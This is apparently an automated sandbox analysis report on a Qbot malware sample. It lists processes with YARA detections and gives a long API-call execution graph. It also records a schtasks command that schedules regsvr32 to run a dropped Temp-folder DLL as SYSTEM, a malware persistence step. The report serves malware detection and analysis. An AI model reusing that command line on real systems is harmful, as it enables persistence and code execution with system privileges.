                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000000.492939442.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Target ID:34
                                                                                                                                                                      Start time:18:45:48
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000000.493470383.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000002.497271923.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Target ID:36
                                                                                                                                                                      Start time:18:45:50
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000024.00000002.502484210.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000024.00000000.497169249.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Target ID:38
                                                                                                                                                                      Start time:18:45:52
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59
                                                                                                                                                                      Imagebase:0x270000
                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:39
                                                                                                                                                                      Start time:18:45:53
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff647620000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:40
                                                                                                                                                                      Start time:18:45:55
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A"
                                                                                                                                                                      Imagebase:0x7ff6e54f0000
                                                                                                                                                                      File size:24064 bytes
                                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Target ID:41
                                                                                                                                                                      Start time:18:45:56
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline: -s "C:\Users\user\AppData\Local\Temp\t.A"
                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000029.00000002.549011824.00000000033F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000029.00000002.549011824.00000000033F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000029.00000002.550245813.0000000003420000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000029.00000002.550560608.0000000003440000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6.2%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:3.5%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:53
14130->14132 14134 49ea96c 4 API calls 14131->14134 14133 49ea96c 4 API calls 14132->14133 14135 49e10f9 14133->14135 14134->14135 14906 49e10c5 14135->14906 14137 49e111b 14137->13871 14178 49f1152 14138->14178 14140 49e7da4 14182 49e8753 14140->14182 14142 49e7db7 14143 49e8753 strncpy 14142->14143 14144 49e7dcb 14143->14144 14145 49e8753 strncpy 14144->14145 14146 49e7ddf 14145->14146 14186 49f1bd3 14146->14186 14148 49e7de7 14148->13908 14274 49e74fa 14149->14274 14153 49e764b 14164 49e7680 14153->14164 14288 49e7417 14153->14288 14155 49e8bf4 2 API calls 14156 49e7698 14155->14156 14157 49e8bf4 2 API calls 14156->14157 14158 49e76a3 14157->14158 14160 49e8bf4 2 API calls 14158->14160 14159 49e7659 14159->14164 14296 49efab4 14159->14296 14162 49e76ae 14160->14162 14163 49e8bf4 2 API calls 14162->14163 14165 49e76b8 14162->14165 14163->14165 14164->14155 14165->13911 14167 49ec307 2 API calls 14166->14167 14168 49e75c3 14167->14168 14169 49e75ff 14168->14169 14170 49e7473 5 API calls 14168->14170 14175 49e77de 14169->14175 14171 49e75e2 14170->14171 14172 49f0320 lstrlenW 14171->14172 14173 49e75f6 14172->14173 14174 49e8ce0 lstrlenA 14173->14174 14174->14169 14365 49f1cc0 14175->14365 14177 49e77f7 14177->13910 14179 49f115a 14178->14179 14180 49f1161 14179->14180 14191 49f288e 14179->14191 14180->14140 14183 49e8764 14182->14183 14184 49e8769 14182->14184 14183->14142 14209 49f1232 14184->14209 14187 49f1be2 14186->14187 14188 49f1be7 14187->14188 14221 49f1b77 14187->14221 14188->14148 14190 49f1c00 14190->14148 14192 49f289d 14191->14192 14193 49f28d0 14191->14193 14194 49f28ae 14192->14194 14195 49f28c1 SwitchToThread 14192->14195 14193->14180 14196 49f28b7 14194->14196 14198 49f2868 14194->14198 14195->14193 14195->14195 14196->14180 14203 49f28f0 GetModuleHandleW 14198->14203 14200 49f2875 14202 49f2883 14200->14202 14208 49f28d2 _time64 GetCurrentProcessId 14200->14208 14202->14196 14204 49f290e GetProcAddress 14203->14204 14207 49f293f 14203->14207 
14205 49f2922 GetProcAddress 14204->14205 14204->14207 14206 49f2931 GetProcAddress 14205->14206 14205->14207 14206->14207 14207->14200 14208->14202 14210 49f123d 14209->14210 14211 49f1264 14209->14211 14210->14211 14213 49f1278 14210->14213 14211->14183 14214 49f12a6 14213->14214 14215 49f1283 14213->14215 14214->14211 14215->14214 14217 49f2e7a 14215->14217 14219 49f2e92 14217->14219 14218 49f2ee5 14218->14214 14219->14218 14220 49f2f19 strncpy 14219->14220 14220->14218 14222 49f1b8a 14221->14222 14224 49f1ba6 14222->14224 14225 49f1464 14222->14225 14224->14190 14226 49f1492 14225->14226 14230 49f14a4 14225->14230 14227 49f154f 14226->14227 14228 49f14ce 14226->14228 14229 49f14fe 14226->14229 14226->14230 14231 49f1662 14226->14231 14236 49f152e 14226->14236 14266 49f1c2d _snprintf 14227->14266 14233 49f14d4 _snprintf 14228->14233 14249 49f3379 14229->14249 14230->14224 14234 49f1c2d 2 API calls 14231->14234 14233->14230 14238 49f1691 14234->14238 14261 49f19a9 14236->14261 14238->14230 14240 49f1849 14238->14240 14241 49f1713 14238->14241 14239 49f155e 14239->14230 14242 49f1464 11 API calls 14239->14242 14240->14230 14243 49f19a9 2 API calls 14240->14243 14245 49f1464 11 API calls 14240->14245 14241->14230 14244 49f1754 qsort 14241->14244 14242->14239 14243->14240 14244->14230 14248 49f177d 14244->14248 14245->14240 14246 49f19a9 2 API calls 14246->14248 14247 49f1464 11 API calls 14247->14248 14248->14230 14248->14246 14248->14247 14250 49f3386 _snprintf 14249->14250 14251 49f3383 14249->14251 14252 49f33af 14250->14252 14253 49f3426 14250->14253 14251->14250 14252->14253 14271 49f3352 localeconv 14252->14271 14253->14230 14256 49f33ed strchr 14256->14253 14259 49f3400 14256->14259 14257 49f33c9 strchr 14257->14256 14258 49f33d7 14257->14258 14258->14253 14258->14256 14259->14253 14260 49e8ce0 lstrlenA 14259->14260 14260->14253 14263 49f19bf 14261->14263 14262 49f1b47 14262->14230 14263->14262 14264 49f1ad9 _snprintf 14263->14264 14265 49f1ac2 _snprintf 
14263->14265 14264->14263 14265->14263 14267 49f1c4e 14266->14267 14268 49f1c55 14267->14268 14269 49f2e7a strncpy 14267->14269 14268->14239 14270 49f1c6b 14269->14270 14270->14239 14272 49f3374 strchr 14271->14272 14273 49f3362 strchr 14271->14273 14272->14256 14272->14257 14273->14272 14300 49e8bde RtlAllocateHeap 14274->14300 14276 49e7514 14277 49e7595 14276->14277 14278 49f351a 2 API calls 14276->14278 14277->14165 14285 49ec295 14277->14285 14279 49e7538 14278->14279 14301 49e7473 14279->14301 14281 49e754d 14282 49f0320 lstrlenW 14281->14282 14283 49e7580 14282->14283 14284 49e8d6d memset 14283->14284 14284->14277 14310 49e8bde RtlAllocateHeap 14285->14310 14287 49ec2ba 14287->14153 14289 49e7428 14288->14289 14290 49e96da 2 API calls 14289->14290 14291 49e7444 14290->14291 14311 49e8bde RtlAllocateHeap 14291->14311 14293 49e744f 14294 49e7469 14293->14294 14295 49e9e12 2 API calls 14293->14295 14294->14159 14295->14294 14299 49efac8 14296->14299 14298 49efb0e 14298->14164 14299->14298 14312 49efb15 14299->14312 14300->14276 14302 49e748c 14301->14302 14303 49e1080 2 API calls 14302->14303 14304 49e7499 lstrcpynA 14303->14304 14305 49e74b7 14304->14305 14306 49e8b9c 2 API calls 14305->14306 14307 49e74c1 14306->14307 14308 49e8d6d memset 14307->14308 14309 49e74e6 14308->14309 14309->14281 14310->14287 14311->14293 14317 49ef7a6 memset memset 14312->14317 14314 49efb64 14314->14299 14315 49efb41 14315->14314 14343 49ef5a4 14315->14343 14318 49e9dd8 2 API calls 14317->14318 14319 49ef7fa 14318->14319 14320 49e9dd8 2 API calls 14319->14320 14321 49ef807 14320->14321 14322 49e9dd8 2 API calls 14321->14322 14323 49ef814 14322->14323 14324 49e9dd8 2 API calls 14323->14324 14325 49ef821 14324->14325 14326 49e9dd8 2 API calls 14325->14326 14327 49ef82e 14326->14327 14328 49e8d6d memset 14327->14328 14337 49ef842 14328->14337 14329 49ef8bf GetLastError 14329->14337 14330 49efa12 14331 49e8d6d memset 14330->14331 14336 49ef88c 14330->14336 14332 49efa34 14331->14332 
14335 49efa50 GetLastError 14332->14335 14332->14336 14333 49ef900 GetLastError 14333->14337 14334 49ea065 GetSystemTimeAsFileTime 14334->14337 14335->14336 14336->14315 14337->14329 14337->14330 14337->14333 14337->14334 14337->14336 14338 49ef958 GetLastError 14337->14338 14340 49e9dd8 2 API calls 14337->14340 14341 49e8b9c 2 API calls 14337->14341 14342 49ef9d2 GetLastError 14337->14342 14359 49ef6ec 14337->14359 14338->14337 14340->14337 14341->14337 14342->14337 14344 49ef5c1 14343->14344 14363 49e8bde RtlAllocateHeap 14344->14363 14346 49ef5d6 14358 49ef5df 14346->14358 14364 49e8bde RtlAllocateHeap 14346->14364 14348 49ef6ca 14348->14314 14349 49ef6b2 14349->14348 14351 49e8bf4 2 API calls 14349->14351 14350 49e8bf4 2 API calls 14350->14349 14351->14348 14352 49ef5ef 14352->14349 14353 49ef68c GetLastError 14352->14353 14355 49ea065 GetSystemTimeAsFileTime 14352->14355 14357 49e8c72 3 API calls 14352->14357 14352->14358 14354 49ef698 14353->14354 14353->14358 14356 49ea065 GetSystemTimeAsFileTime 14354->14356 14355->14352 14356->14358 14357->14352 14358->14349 14358->14350 14360 49ef70e 14359->14360 14361 49ef733 GetLastError 14360->14361 14362 49ef72e 14360->14362 14361->14362 14362->14337 14363->14346 14364->14352 14366 49f1d13 14365->14366 14367 49f1ccd 14365->14367 14366->14177 14367->14366 14370 49f240b 14367->14370 14369 49f1d00 14369->14177 14377 49f1e0e 14370->14377 14372 49f2422 14376 49f2449 14372->14376 14381 49f257f 14372->14381 14374 49f2440 14375 49f1e0e 8 API calls 14374->14375 14374->14376 14375->14376 14376->14369 14378 49f1e20 14377->14378 14380 49f1e59 14378->14380 14391 49f1fad 14378->14391 14380->14372 14382 49f2596 14381->14382 14389 49f25e0 14381->14389 14383 49f2606 14382->14383 14384 49f25b2 14382->14384 14382->14389 14417 49f238b 14383->14417 14385 49f25b7 14384->14385 14386 49f25f5 14384->14386 14385->14389 14390 49f25c8 memchr 14385->14390 14407 49f247c 14386->14407 14389->14374 14390->14389 14392 49f1fc7 14391->14392 14393 
49f1fec 14392->14393 14394 49f2081 14392->14394 14395 49f2036 14392->14395 14393->14380 14394->14393 14398 49f3439 14394->14398 14397 49f2046 _errno _strtoi64 _errno 14395->14397 14397->14393 14404 49f349d localeconv 14398->14404 14401 49f3471 14402 49f3480 _errno 14401->14402 14403 49f348c 14401->14403 14402->14403 14403->14393 14405 49f34ad strchr 14404->14405 14406 49f3448 _errno strtod 14404->14406 14405->14406 14406->14401 14406->14402 14408 49f1152 7 API calls 14407->14408 14409 49f2488 14408->14409 14410 49f24aa 14409->14410 14411 49f1e0e 8 API calls 14409->14411 14410->14389 14416 49f249e 14411->14416 14412 49f24c7 memchr 14412->14410 14412->14416 14413 49f1e0e 8 API calls 14413->14416 14414 49f257f 17 API calls 14414->14416 14415 49f1278 strncpy 14415->14416 14416->14410 14416->14412 14416->14413 14416->14414 14416->14415 14418 49f2394 14417->14418 14419 49f1e0e 8 API calls 14418->14419 14420 49f23af 14418->14420 14422 49f23a7 14419->14422 14420->14389 14421 49f257f 18 API calls 14421->14422 14422->14420 14422->14421 14423 49f1e0e 8 API calls 14422->14423 14423->14422 14424->13923 14426 49e9e12 2 API calls 14425->14426 14427 49e68b3 14426->14427 14428 49ee712 14427->14428 14429 49e9df2 2 API calls 14428->14429 14430 49ee727 14429->14430 14579 49ee400 CoInitializeEx CoInitializeSecurity CoCreateInstance 14430->14579 14433 49e8baf 2 API calls 14434 49ee73f 14433->14434 14435 49e9df2 2 API calls 14434->14435 14450 49e68b8 14434->14450 14436 49ee753 14435->14436 14437 49e9df2 2 API calls 14436->14437 14438 49ee764 14437->14438 14586 49ee656 SysAllocString SysAllocString 14438->14586 14440 49ee775 14441 49ee7a3 14440->14441 14443 49e98bd RtlAllocateHeap 14440->14443 14442 49e8baf 2 API calls 14441->14442 14444 49ee7ac 14442->14444 14445 49ee784 VariantClear 14443->14445 14446 49e8baf 2 API calls 14444->14446 14445->14441 14448 49ee7b5 14446->14448 14592 49ee4b4 14448->14592 14450->13930 14452 49e9df2 2 API calls 14451->14452 14453 49ee7db 14452->14453 14454 
49ee400 6 API calls 14453->14454 14455 49ee7e5 14454->14455 14456 49e8baf 2 API calls 14455->14456 14457 49ee7f3 14456->14457 14458 49e9df2 2 API calls 14457->14458 14473 49e696c 14457->14473 14459 49ee807 14458->14459 14460 49e9df2 2 API calls 14459->14460 14461 49ee818 14460->14461 14462 49ee656 10 API calls 14461->14462 14463 49ee829 14462->14463 14464 49ee857 14463->14464 14465 49e98bd RtlAllocateHeap 14463->14465 14466 49e8baf 2 API calls 14464->14466 14468 49ee838 VariantClear 14465->14468 14467 49ee860 14466->14467 14469 49e8baf 2 API calls 14467->14469 14468->14464 14471 49ee869 14469->14471 14472 49ee4b4 2 API calls 14471->14472 14472->14473 14474 49ee87a 14473->14474 14475 49e9df2 2 API calls 14474->14475 14476 49ee88f 14475->14476 14477 49ee400 6 API calls 14476->14477 14478 49ee899 14477->14478 14479 49e8baf 2 API calls 14478->14479 14480 49ee8a7 14479->14480 14481 49e9df2 2 API calls 14480->14481 14496 49e6974 14480->14496 14482 49ee8bb 14481->14482 14483 49e9df2 2 API calls 14482->14483 14484 49ee8cc 14483->14484 14485 49ee656 10 API calls 14484->14485 14486 49ee8dd 14485->14486 14487 49ee90b 14486->14487 14488 49e98bd RtlAllocateHeap 14486->14488 14489 49e8baf 2 API calls 14487->14489 14490 49ee8ec VariantClear 14488->14490 14491 49ee914 14489->14491 14490->14487 14493 49e8baf 2 API calls 14491->14493 14494 49ee91d 14493->14494 14495 49ee4b4 2 API calls 14494->14495 14495->14496 14497 49e6f6c 14496->14497 14597 49e8bde RtlAllocateHeap 14497->14597 14499 49e6f74 14500 49e6f9d 14499->14500 14598 49e8bde RtlAllocateHeap 14499->14598 14500->13943 14502 49e6f85 14502->14500 14599 49eba09 14502->14599 14506 49e8d6d memset 14505->14506 14507 49eb6f2 14506->14507 14508 49e8d6d memset 14507->14508 14509 49eb6fe 14508->14509 14512 49e6a94 14509->14512 14518 49eb856 14509->14518 14603 49e8bde RtlAllocateHeap 14509->14603 14510 49e8bf4 2 API calls 14510->14512 14512->13972 14513 49eb76d 14513->14512 14514 49e9a07 2 API calls 14513->14514 14515 49e9880 
RtlAllocateHeap 14513->14515 14516 49e8bf4 2 API calls 14513->14516 14517 49eb81c 14513->14517 14513->14518 14514->14513 14515->14513 14516->14513 14517->14518 14519 49e9930 2 API calls 14517->14519 14518->14510 14520 49eb83f 14519->14520 14520->14518 14521 49eb845 14520->14521 14522 49e8bf4 2 API calls 14521->14522 14522->14512 14580 49ee482 14579->14580 14581 49ee445 SysAllocString 14579->14581 14580->14433 14582 49ee460 14581->14582 14582->14580 14583 49ee464 CoSetProxyBlanket 14582->14583 14583->14580 14584 49ee47b 14583->14584 14596 49e8bde RtlAllocateHeap 14584->14596 14587 49e9df2 2 API calls 14586->14587 14588 49ee681 SysAllocString 14587->14588 14589 49e8baf 2 API calls 14588->14589 14591 49ee694 SysFreeString SysFreeString SysFreeString 14589->14591 14591->14440 14593 49ee4bf 14592->14593 14594 49e8bf4 2 API calls 14593->14594 14595 49ee4dc 14594->14595 14595->14450 14596->14580 14597->14499 14598->14502 14600 49eba25 14599->14600 14601 49e8d6d memset 14600->14601 14602 49e6f99 14600->14602 14601->14602 14602->13943 14603->14513 14615 49f03dd GetTickCount 14614->14615 14616 49f03cc __aulldiv 14614->14616 14615->14080 14616->14080 14618 49f1152 7 API calls 14617->14618 14619 49e803c 14618->14619 14620 49e8753 strncpy 14619->14620 14621 49e8055 14620->14621 14622 49e8753 strncpy 14621->14622 14623 49e8069 14622->14623 14624 49e8753 strncpy 14623->14624 14625 49e807a 14624->14625 14626 49e8753 strncpy 14625->14626 14627 49e808b 14626->14627 14628 49e8753 strncpy 14627->14628 14629 49e80a1 14628->14629 14630 49e8753 strncpy 14629->14630 14631 49e80b5 14630->14631 14632 49e8753 strncpy 14631->14632 14633 49e80ce 14632->14633 14634 49e8753 strncpy 14633->14634 14635 49e80e2 14634->14635 14636 49e8753 strncpy 14635->14636 14637 49e80f6 14636->14637 14638 49e8753 strncpy 14637->14638 14639 49e810a 14638->14639 14640 49e8753 strncpy 14639->14640 14641 49e8120 14640->14641 14642 49e8753 strncpy 14641->14642 14643 49e8137 14642->14643 14767 49e87af 14643->14767 
14646 49e8753 strncpy 14647 49e814a 14646->14647 14648 49e8753 strncpy 14647->14648 14649 49e815e 14648->14649 14650 49e8753 strncpy 14649->14650 14651 49e8172 14650->14651 14652 49e87af 5 API calls 14651->14652 14653 49e817a 14652->14653 14654 49e8753 strncpy 14653->14654 14655 49e8185 14654->14655 14656 49e87af 5 API calls 14655->14656 14657 49e818d 14656->14657 14658 49e8753 strncpy 14657->14658 14659 49e8198 14658->14659 14660 49e87af 5 API calls 14659->14660 14661 49e81a0 14660->14661 14662 49e8753 strncpy 14661->14662 14663 49e81ab 14662->14663 14664 49e8753 strncpy 14663->14664 14665 49e81bf 14664->14665 14666 49e87af 5 API calls 14665->14666 14667 49e81c7 14666->14667 14668 49e8753 strncpy 14667->14668 14669 49e81d2 14668->14669 14670 49e8753 strncpy 14669->14670 14671 49e81ec 14670->14671 14672 49e87af 5 API calls 14671->14672 14673 49e81f4 14672->14673 14674 49e8753 strncpy 14673->14674 14675 49e81ff 14674->14675 14676 49e8753 strncpy 14675->14676 14677 49e8213 14676->14677 14678 49e8753 strncpy 14677->14678 14679 49e8227 14678->14679 14680 49e87af 5 API calls 14679->14680 14681 49e823b 14680->14681 14682 49e8753 strncpy 14681->14682 14683 49e8246 14682->14683 14684 49e8753 strncpy 14683->14684 14685 49e825a 14684->14685 14686 49e8753 strncpy 14685->14686 14687 49e826e 14686->14687 14688 49e87af 5 API calls 14687->14688 14689 49e8279 14688->14689 14690 49e8753 strncpy 14689->14690 14691 49e8284 14690->14691 14692 49e87af 5 API calls 14691->14692 14693 49e828f 14692->14693 14694 49e8753 strncpy 14693->14694 14695 49e829a 14694->14695 14696 49e87af 5 API calls 14695->14696 14697 49e82a5 14696->14697 14698 49e8753 strncpy 14697->14698 14772 49e996c 14767->14772 14769 49e813f 14769->14646 14770 49e87c2 14770->14769 14771 49e8bf4 2 API calls 14770->14771 14771->14769 14773 49e997b WideCharToMultiByte 14772->14773 14775 49e99cb 14772->14775 14774 49e9996 14773->14774 14773->14775 14781 49e8bde RtlAllocateHeap 14774->14781 14775->14770 14777 49e999f 14777->14775 
14778 49e99a7 WideCharToMultiByte 14777->14778 14778->14775 14779 49e99c0 14778->14779 14780 49e8bf4 2 API calls 14779->14780 14780->14775 14781->14777 14783 49e971d 14782->14783 14784 49f3674 2 API calls 14783->14784 14786 49e9767 14784->14786 14785 49e7a02 14785->14098 14786->14785 14787 49f3674 2 API calls 14786->14787 14787->14786 14789 49f1152 7 API calls 14788->14789 14790 49e7e07 14789->14790 14791 49e8753 strncpy 14790->14791 14792 49e7e1d 14791->14792 14793 49e8753 strncpy 14792->14793 14794 49e7e32 14793->14794 14795 49e8753 strncpy 14794->14795 14796 49e7e46 14795->14796 14797 49e8753 strncpy 14796->14797 14798 49e7e5b 14797->14798 14799 49e8753 strncpy 14798->14799 14800 49e7e6c 14799->14800 14801 49e8753 strncpy 14800->14801 14802 49e7e85 14801->14802 14803 49e8753 strncpy 14802->14803 14804 49e7e9b 14803->14804 14805 49e8753 strncpy 14804->14805 14806 49e7eac 14805->14806 14807 49e8753 strncpy 14806->14807 14808 49e7ec0 14807->14808 14809 49e8753 strncpy 14808->14809 14810 49e7ed3 14809->14810 14811 49e8753 strncpy 14810->14811 14812 49e7ee7 14811->14812 14813 49e8753 strncpy 14812->14813 14814 49e7f06 14813->14814 14815 49e87af 5 API calls 14814->14815 14816 49e7f17 14815->14816 14817 49e8753 strncpy 14816->14817 14818 49e7f22 14817->14818 14819 49e87af 5 API calls 14818->14819 14820 49e7f33 14819->14820 14821 49e8753 strncpy 14820->14821 14822 49e7f3e 14821->14822 14823 49e8753 strncpy 14822->14823 14824 49e7f5a 14823->14824 14825 49f1bd3 13 API calls 14824->14825 14826 49e7f62 14825->14826 14826->14102 14828 49f1cc0 18 API calls 14827->14828 14830 49e7876 14828->14830 14829 49e7882 14829->14113 14830->14829 14831 49e9edb memset 14830->14831 14832 49e78b6 14831->14832 14832->14829 14869 49e8bde RtlAllocateHeap 14832->14869 14834 49e793a 14834->14829 14836 49e798e 14834->14836 14837 49e9880 RtlAllocateHeap 14834->14837 14835 49e8bf4 2 API calls 14835->14836 14836->14835 14838 49e799f 14836->14838 14837->14834 14839 49e8bf4 2 API calls 14838->14839 
14839->14829 14841 49e773f 14840->14841 14842 49ec307 2 API calls 14841->14842 14843 49e77cf 14841->14843 14844 49e775b 14842->14844 14843->14119 14854 49e1190 14843->14854 14844->14843 14845 49e77a7 14844->14845 14870 49e8bde RtlAllocateHeap 14844->14870 14847 49e8bf4 2 API calls 14845->14847 14849 49e77c5 14847->14849 14848 49e7778 14848->14845 14851 49e9e12 2 API calls 14848->14851 14850 49e8bf4 2 API calls 14849->14850 14850->14843 14852 49e7797 14851->14852 14871 49e89dd 14852->14871 14855 49e111d 8 API calls 14854->14855 14856 49e11a1 14855->14856 14857 49e11ae 14856->14857 14858 49e8d6d memset 14856->14858 14857->14117 14859 49e11c4 14858->14859 14860 49e1dd3 6 API calls 14859->14860 14861 49e11d4 14860->14861 14861->14117 14887 49e7f75 14862->14887 14864 49e76f4 14865 49e7611 19 API calls 14864->14865 14866 49e7714 14865->14866 14867 49e8bf4 2 API calls 14866->14867 14868 49e771f 14867->14868 14868->14119 14869->14834 14870->14848 14874 49e8871 14871->14874 14881 49e87e5 14874->14881 14876 49e8897 14877 49e88ca GetLastError 14876->14877 14878 49e8959 14876->14878 14880 49e889e 14876->14880 14877->14878 14879 49e8bf4 2 API calls 14878->14879 14879->14880 14880->14845 14886 49e8bde RtlAllocateHeap 14881->14886 14883 49e883d lstrlenA 14885 49e884e 14883->14885 14884 49e87f6 14884->14883 14884->14884 14884->14885 14885->14876 14885->14885 14886->14884 14888 49f1152 7 API calls 14887->14888 14889 49e7f84 14888->14889 14890 49e8753 strncpy 14889->14890 14891 49e7f9a 14890->14891 14892 49e8753 strncpy 14891->14892 14893 49e7fae 14892->14893 14894 49e8753 strncpy 14893->14894 14895 49e7fbf 14894->14895 14896 49e8753 strncpy 14895->14896 14897 49e7fd0 14896->14897 14898 49e8753 strncpy 14897->14898 14899 49e7fe5 14898->14899 14900 49e8753 strncpy 14899->14900 14901 49e7ffb 14900->14901 14902 49e8753 strncpy 14901->14902 14903 49e8011 14902->14903 14904 49f1bd3 13 API calls 14903->14904 14905 49e8019 14904->14905 14905->14864 14907 49e9e12 2 API calls 14906->14907 
14908 49e10df 14907->14908 14908->14137 14917 49f083c 14920 49e8bde RtlAllocateHeap 14917->14920 14919 49f084c 14920->14919 13347 49e59b1 13348 49e9d18 4 API calls 13347->13348 13349 49e59c9 13348->13349 13350 49e5ab2 13349->13350 13366 49e8bde RtlAllocateHeap 13349->13366 13352 49e59e0 13352->13350 13353 49e9dd8 2 API calls 13352->13353 13354 49e59f8 13353->13354 13355 49e9e12 2 API calls 13354->13355 13356 49e5a0d 13355->13356 13357 49e8b9c 2 API calls 13356->13357 13358 49e5a15 13357->13358 13359 49e8bf4 2 API calls 13358->13359 13360 49e5a30 13359->13360 13361 49eb5fb 2 API calls 13360->13361 13363 49e5a3e 13361->13363 13362 49ebfdb 11 API calls 13362->13363 13363->13362 13364 49e5aa7 13363->13364 13365 49e8bf4 2 API calls 13364->13365 13365->13350 13366->13352 11226 49e632e 11227 49e633e ExitProcess 11226->11227 13382 49e28a4 13383 49e28ba 13382->13383 13401 49e2959 13382->13401 13385 49ec307 2 API calls 13383->13385 13384 49e9c2c 2 API calls 13386 49e2966 13384->13386 13387 49e28c7 13385->13387 13404 49e9d81 13387->13404 13390 49e9930 2 API calls 13391 49e28d5 13390->13391 13392 49e109a 2 API calls 13391->13392 13391->13401 13393 49e28e8 13392->13393 13394 49e9a5a 2 API calls 13393->13394 13395 49e2900 13394->13395 13396 49e8baf 2 API calls 13395->13396 13397 49e290e 13396->13397 13398 49e294c 13397->13398 13399 49eb5fb 2 API calls 13397->13399 13400 49e8bf4 2 API calls 13398->13400 13402 49e292c 13399->13402 13400->13401 13401->13384 13403 49e8bf4 2 API calls 13402->13403 13403->13398 13405 49e28ce 13404->13405 13406 49e9d8a 13404->13406 13405->13390 13408 49e8bde RtlAllocateHeap 13406->13408 13408->13405 13449 49e29a1 13450 49e2a06 13449->13450 13453 49e29b5 13449->13453 13460 49e29f5 13450->13460 13461 49e1b48 13450->13461 13452 49e9c2c 2 API calls 13454 49e2a20 13452->13454 13455 49eaa65 6 API calls 13453->13455 13453->13460 13456 49e29e2 13455->13456 13457 49eaa65 6 API calls 13456->13457 13458 49e29ed 13457->13458 13459 49eaa65 6 API calls 13458->13459 
